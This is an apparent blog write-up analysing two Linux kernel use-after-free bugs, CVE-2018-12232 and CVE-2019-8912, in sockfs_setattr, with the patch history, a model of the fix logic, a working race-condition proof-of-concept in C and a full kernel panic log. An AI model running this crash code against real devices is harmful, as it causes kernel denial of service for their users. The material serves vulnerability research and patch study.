
CVE-2018-12232-And-CVE-2019-8912

2019/04/03 Android_Kernel



Preface

Vulnerability Information

Vulnerability Analysis

Root Cause

A short note on the two vulnerabilities I looked at today, CVE-2018-12232 and CVE-2019-8912; both are quite interesting. CVE-2018-12232 is a use-after-free caused by a race condition: close() frees sk without setting sock->sk to NULL, and sockfs_setattr then takes sock->sk and uses it directly. The second one, CVE-2019-8912, is a follow-up fix: the patch for CVE-2018-12232 was not thought through carefully enough, so it did not fully close the hole and the first fix could be bypassed.

Impact

A use-after-free triggered through a race condition ends in a kernel-mode NULL pointer dereference, giving a denial of service.

Intent of the Patches

The Linux patch for this vulnerability landed in June 2018. It mainly added a check in sockfs_setattr for whether sock->sk is NULL. Since release functions normally set sock->sk to NULL after freeing the sk memory, a NULL check in sockfs_setattr should prevent the use-after-free that occurs when another thread races through the release function and frees sock->sk. Unfortunately this patch cannot be called a successful one.

That led to the second round of fixing, which itself came in two steps. On 2019-02-18 only the crypto module was changed: af_alg_release now sets sock->sk to NULL, which avoids the UAF for AF_ALG sockets. It was then realised that this did not address the root cause, because the release functions of many other modules also fail to set sock->sk to NULL. So on 2019-02-25 a further patch was applied, this time setting sock->sk to NULL directly after the call to the release function. Only this fix fundamentally solves the NULL pointer dereference caused by sock->sk not being cleared after its memory is freed.

Vulnerability Model

Memory is freed but the pointer variable is not set to NULL; another code path still holds a reference to it and uses it without checking for NULL, which triggers a use-after-free. A textbook use-after-free pattern.
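As an added illustration (not the page's or the kernel's own code), the C model below reproduces in userspace the logic the two patches changed, as described in the patch section and the model above: a protocol release that does or does not clear sock->sk, the NULL check added to sockfs_setattr in 2018, and the generic clearing of sock->sk after ops->release() added on 2019-02-25. Struct layouts, the freed flag and the return codes are the model's own assumptions.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>

/* Reduced userspace model of the kernel objects involved. Names follow the
 * kernel but each struct keeps only the fields the bug touches, and "freeing"
 * a sock just marks it so a dangling use stays observable without real UB. */
struct sock { int sk_uid; bool freed; };
struct socket;
struct proto_ops { void (*release)(struct socket *sock); };
struct socket { struct sock *sk; const struct proto_ops *ops; };

static void sk_free(struct sock *sk) { sk->freed = true; }
/* Protocol release that clears the pointer after freeing: the common case. */
static void clearing_release(struct socket *sock) { sk_free(sock->sk); sock->sk = NULL; }
/* Protocol release that frees but leaves sock->sk dangling: the shape behind CVE-2019-8912. */
static void dangling_release(struct socket *sock) { sk_free(sock->sk); }

static const struct proto_ops clearing_ops = { clearing_release };
static const struct proto_ops dangling_ops = { dangling_release };

/* close() path. generic_fix selects the 2019-02-25 change: the core clears
 * sock->sk right after ops->release(), whatever the protocol did. */
static void sock_release(struct socket *sock, bool generic_fix)
{
    sock->ops->release(sock);
    if (generic_fix)
        sock->sk = NULL;
    sock->ops = NULL;
}

/* fchownat() path carrying the June 2018 NULL check from the CVE-2018-12232 fix.
 * -EFAULT is this model's marker for "would have written to freed memory". */
static int sockfs_setattr(struct socket *sock, int new_uid)
{
    if (!sock->sk)
        return -ENOENT;   /* 2018 fix: the sock is already gone */
    if (sock->sk->freed)
        return -EFAULT;   /* model only: this is the use-after-free */
    sock->sk->sk_uid = new_uid;
    return 0;
}

/* The losing interleaving: close() finishes, then setattr runs on the same socket. */
static int race_outcome(const struct proto_ops *ops, bool generic_fix)
{
    struct sock sk = { .sk_uid = 0, .freed = false };
    struct socket sock = { .sk = &sk, .ops = ops };
    sock_release(&sock, generic_fix);
    return sockfs_setattr(&sock, 2000);
}
```

With only the 2018 check, a protocol whose release leaves sock->sk dangling still reaches freed memory; with the generic clearing the check catches every protocol.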

Reproduction

Proof of Concept

#include <pthread.h>
#include <stdio.h>      /* perror */
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>      /* fchownat */
#include <arpa/inet.h>
#include <sys/socket.h>

pthread_t t;
volatile int fd;

/* Thread 1: keeps closing whatever fd main() last created, racing the
 * release path (which frees sock->sk) against the setattr path below. */
void *close_thread(void *arg)
{
    for (;;) {
        close(fd);
    }
}

/* Thread 2: keeps chown-ing the socket through its fd. 0x1000 is
 * AT_EMPTY_PATH, so the empty path means "operate on fd itself"; this
 * reaches sockfs_setattr, which dereferences sock->sk. */
void *setattr_thread(void *arg)
{
    for (;;) {
        if (fchownat(fd, "", 2000, 2000, 0x1000) == -1) {
            //perror("> ");
        }
    }
}

int main(void)
{
    pthread_create(&t, NULL, close_thread, NULL);
    pthread_create(&t, NULL, setattr_thread, NULL);
    /* Main thread: create and close sockets as fast as possible so the fd
     * number is constantly reused and the two threads hit a freed sock. */
    for (;;) {
        fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (fd == -1) {
            perror("> ");
        }
        close(fd);
    }
}

Crash Log

[25032.287867] FG: soc_work_fn: adjust_soc: 079: 00, 00, 00, 03
[25032.946282] Unable to handle kernel NULL pointer dereference at virtual address 0000025c
[25032.946349] pgd = ffffffc092f0f000
[25032.946364] [0000025c] *pgd=00000000f0737003, *pud=00000000f0737003, *pmd=0000000000000000
[25032.946601] ------------[ cut here ]------------
[25032.946618] Kernel BUG at ffffff8008cc2284 [verbose debug info unavailable]
[25032.946636] Internal error: Oops - BUG: 96000046 [#1] PREEMPT SMP
[25032.946653] Modules linked in: wlan(O) exfat(O)
[25032.946707] CPU: 2 PID: 9620 Comm: poc Tainted: G W O 4.4.78-perf-gdd4cbe9-00529-g1a92c1c #1
[25032.946722] Hardware name: Qualcomm Technologies, Inc. MSM 8998 v2.1 MTP (DT)
[25032.946743] task: ffffffc0a2ca3000 ti: ffffffc0a41fc000 task.ti: ffffffc0a41fc000
[25032.946789] PC is at sockfs_setattr+0x30/0x40
[25032.946809] LR is at sockfs_setattr+0x18/0x40
[25032.946826] pc : [<ffffff8008cc2284>] lr : [<ffffff8008cc226c>] pstate: 20000145
[25032.946839] sp : ffffffc0a41ffd40
[25032.946852] x29: ffffffc0a41ffd40 x28: ffffffc0a41fc000
[25032.946877] x27: 0000000000005800 x26: 000000000000c1ff
[25032.946901] x25: ffffffc0a41ffe18 x24: ffffffc174cf43a0
[25032.946924] x23: ffffffc0ac9c6840 x22: ffffffc0a41ffe20
[25032.946948] x21: ffffffc0a134d430 x20: ffffffc0ac9c6840
[25032.946972] x19: ffffffc0a41ffe20 x18: 0000000000000000
[25032.946995] x17: 0000000000000001 x16: ffffff80081b6598
[25032.947019] x15: 0000007fe17f3aa8 x14: 0000000000000001
[25032.947042] x13: 0000000000000001 x12: 0000000000000003
[25032.947066] x11: 0101010101010101 x10: fffffffffffffffd
[25032.947088] x9 : 0000000000000005 x8 : 0000000000000002
[25032.947111] x7 : 00000000003ceaa4 x6 : 0000004173d33000
[25032.947134] x5 : 0000000000000000 x4 : 0000000000000000
[25032.947159] x3 : 0000000000000000 x2 : 00000000000007d0
[25032.947182] x1 : 0000000000000000 x0 : 0000000000000000
[25032.947209]
[25032.947209] PC: 0xffffff8008cc2184:
[25032.947225] 2184 36580062 52800802 b90073a2 f9400402 92800380 b5000202 f9400822 d2800000
[25032.947294] 21a4 b40001a2 b94073a3 aa0103f3 aa0403e0 aa1403e1 97ffffcd 93407c00 a9410e82
[25032.947359] 21c4 a9000e62 f9401a81 a9420e82 a9010e62 f9001261 a94153f3 a8c87bfd d65f03c0
[25032.947424] 21e4 a9bb7bfd 910003fd a90153f3 a9025bf5 f9001bf7 aa0103f4 aa0003f7 91004020
[25032.947489] 2204 52800041 aa0403f6 d5384113 f90027a5 f9400675 97dac853 92800000 f9000660
[25032.947555] 2224 f94027a5 aa1703e0 aa1403e1 aa1603e2 2a0503e3 97ffffad f9000675 a94153f3
[25032.947619] 2244 a9425bf5 f9401bf7 a8c57bfd d65f03c0 a9be7bfd 910003fd a90153f3 aa0003f4
[25032.947682] 2264 aa0103f3 97d45e34 350000e0 b9400261 360800a1 f9401a81 b9400a62 f85f0021
[25032.947748] 2284 b9025c22 a94153f3 a8c27bfd d65f03c0 a9bd7bfd 910003fd a90153f3 a9025bf5
[25032.947814] 22a4 2a0203f6 aa0103f3 f9401002 aa0003f5 aa1303e3 79402040 79429441 39452442
[25032.947876] 22c4 97fffcfa 2a0003f4 37f80294 f94016a0 2a1603e2 f9400261 f9401803 aa1503e0
[25032.947942] 22e4 d63f0060 2a0003f4 36f800b4 f9400260 97fffc0d f900027f 14000008 f9400260
[25032.948009] 2304 f94016a1 f9001401 f9400260 f9401400 f9400400 97d16f06 2a1403e0 a94153f3
[25032.948074] 2324 a9425bf5 a8c37bfd d65f03c0 a9be7bfd 7100a01f 910003fd a90153f3 54000049
[25032.948140] 2344 d4210000 9000b7b3 2a0003f4 911b0273 91008273 aa1303e0 9407f3ad d0007a20
[25032.948203] 2364 937d7e81 91352000 91002000 f821681f aa1303e0 9407f433 97d1076f d0005b60
[25032.948272]
[25032.948272] LR: 0xffffff8008cc216c:
[25032.948287] 216c a9047e9f a9021e86 f9001a85 f9003fa0 f9406844 b9404042 36580062 52800802
[25032.948354] 218c b90073a2 f9400402 92800380 b5000202 f9400822 d2800000 b40001a2 b94073a3
[25032.948418] 21ac aa0103f3 aa0403e0 aa1403e1 97ffffcd 93407c00 a9410e82 a9000e62 f9401a81
[25032.948481] 21cc a9420e82 a9010e62 f9001261 a94153f3 a8c87bfd d65f03c0 a9bb7bfd 910003fd
[25032.948544] 21ec a90153f3 a9025bf5 f9001bf7 aa0103f4 aa0003f7 91004020 52800041 aa0403f6
[25032.948609] 220c d5384113 f90027a5 f9400675 97dac853 92800000 f9000660 f94027a5 aa1703e0
[25032.948676] 222c aa1403e1 aa1603e2 2a0503e3 97ffffad f9000675 a94153f3 a9425bf5 f9401bf7
[25032.948741] 224c a8c57bfd d65f03c0 a9be7bfd 910003fd a90153f3 aa0003f4 aa0103f3 97d45e34
[25032.948806] 226c 350000e0 b9400261 360800a1 f9401a81 b9400a62 f85f0021 b9025c22 a94153f3
[25032.948869] 228c a8c27bfd d65f03c0 a9bd7bfd 910003fd a90153f3 a9025bf5 2a0203f6 aa0103f3
[25032.948934] 22ac f9401002 aa0003f5 aa1303e3 79402040 79429441 39452442 97fffcfa 2a0003f4
[25032.949000] 22cc 37f80294 f94016a0 2a1603e2 f9400261 f9401803 aa1503e0 d63f0060 2a0003f4
[25032.949065] 22ec 36f800b4 f9400260 97fffc0d f900027f 14000008 f9400260 f94016a1 f9001401
[25032.949129] 230c f9400260 f9401400 f9400400 97d16f06 2a1403e0 a94153f3 a9425bf5 a8c37bfd
[25032.949194] 232c d65f03c0 a9be7bfd 7100a01f 910003fd a90153f3 54000049 d4210000 9000b7b3
[25032.949261] 234c 2a0003f4 911b0273 91008273 aa1303e0 9407f3ad d0007a20 937d7e81 91352000
[25032.949330]
[25032.949330] SP: 0xffffffc0a41ffc40:
[25032.949345] fc40 73d33000 00000041 003ceaa4 00000000 00000002 00000000 00000005 00000000
[25032.949408] fc60 fffffffd ffffffff 01010101 01010101 00000003 00000000 00000001 00000000
[25032.949472] fc80 00000001 00000000 e17f3aa8 0000007f 081b6598 ffffff80 00000001 00000000
[25032.949536] fca0 00000000 00000000 a41ffe20 ffffffc0 ac9c6840 ffffffc0 a134d430 ffffffc0
[25032.949600] fcc0 a41ffe20 ffffffc0 ac9c6840 ffffffc0 74cf43a0 ffffffc1 a41ffe18 ffffffc0
[25032.949664] fce0 0000c1ff 00000000 00005800 00000000 a41fc000 ffffffc0 a41ffd40 ffffffc0
[25032.949729] fd00 08cc226c ffffff80 a41ffd40 ffffffc0 08cc2284 ffffff80 20000145 00000000
[25032.949796] fd20 a41ffd40 ffffffc0 08cc226c ffffff80 00000000 00000080 ac9c6840 ffffffc0
[25032.949861] fd40 a41ffd60 ffffffc0 081cfbe4 ffffff80 00001846 00000000 00000000 00000000
[25032.949927] fd60 a41ffdb0 ffffffc0 081b54b4 ffffff80 00000000 00000000 a41ffeb0 ffffffc0
[25032.949990] fd80 a134d430 ffffffc0 000007d0 00000000 000007d0 00000000 a134d4d8 ffffffc0
[25032.950055] fda0 00000040 00000000 00000042 00000000 a41ffe70 ffffffc0 081b6628 ffffff80
[25032.950121] fdc0 00000000 00000000 00004001 00000000 00000000 00000000 0042a302 00000000
[25032.950185] fde0 000007d0 00000000 000007d0 00000000 0000011d 00000000 00000036 00000000
[25032.950251] fe00 09002000 ffffff80 00000000 00000000 00000000 00000000 00000000 00000000
[25032.950315] fe20 00001846 00000000 000007d0 000007d0 a41ffe50 ffffffc0 5a043e06 00000000
[25032.950380]
[25032.950396] Process poc (pid: 9620, stack limit = 0xffffffc0a41fc020)
[25032.950412] Call trace:
[25032.950435] Exception stack(0xffffffc0a41ffb70 to 0xffffffc0a41ffca0)
[25032.950454] fb60: ffffffc0a41ffe20 0000008000000000
[25032.950476] fb80: ffffffc0a41ffd40 ffffff8008cc2284 ffffffbdc284d300 ffffffc0a134e080
[25032.950498] fba0: ffffffc174ce2300 ffffff8008cc1d38 ffffffc0a41fc000 ffffffc0a41fc000
[25032.950521] fbc0: 000000000000bf42 ffffff8009007000 ffffff8009002000 ffffffc0a41fc000
[25032.950542] fbe0: ffffffc0a41ffc00 0000000108146380 ffffffc0a134e080 ffffffc0a41fc000
[25032.950564] fc00: ffffffc0a41ffc60 ffffffc0a134e080 0000000000000000 0000000000000000
[25032.950583] fc20: 00000000000007d0 0000000000000000 0000000000000000 0000000000000000
[25032.950603] fc40: 0000004173d33000 00000000003ceaa4 0000000000000002 0000000000000005
[25032.950623] fc60: fffffffffffffffd 0101010101010101 0000000000000003 0000000000000001
[25032.950644] fc80: 0000000000000001 0000007fe17f3aa8 ffffff80081b6598 0000000000000001
[25032.950670] [<ffffff8008cc2284>] sockfs_setattr+0x30/0x40
[25032.950709] [<ffffff80081cfbe4>] notify_change2+0x22c/0x348
[25032.950737] [<ffffff80081b54b4>] chown_common+0xac/0x130
[25032.950759] [<ffffff80081b6628>] SyS_fchownat+0x90/0xd0
[25032.950788] [<ffffff8008082730>] el0_svc_naked+0x24/0x28
[25032.950812] Code: 360800a1 f9401a81 b9400a62 f85f0021 (b9025c22)
[25032.950833] ---[ end trace 891e55ff6a5e58d7 ]---
[25034.044441] Kernel panic - not syncing: Fatal exception
[25034.044474] CPU0: stopping

Summary

Read more kernel patches and see whether similar vulnerabilities can be found through them; there is a good chance of picking up some bugs that way.
Hoping to pick one up soon.

Author: Let_go

Link: http://github.com/2019/04/03/CVE-2018-12232-And-CVE-2019-8912/

Copyright: All articles in this blog are licensed under CC BY-NC-SA 3.0 unless stating additionally.
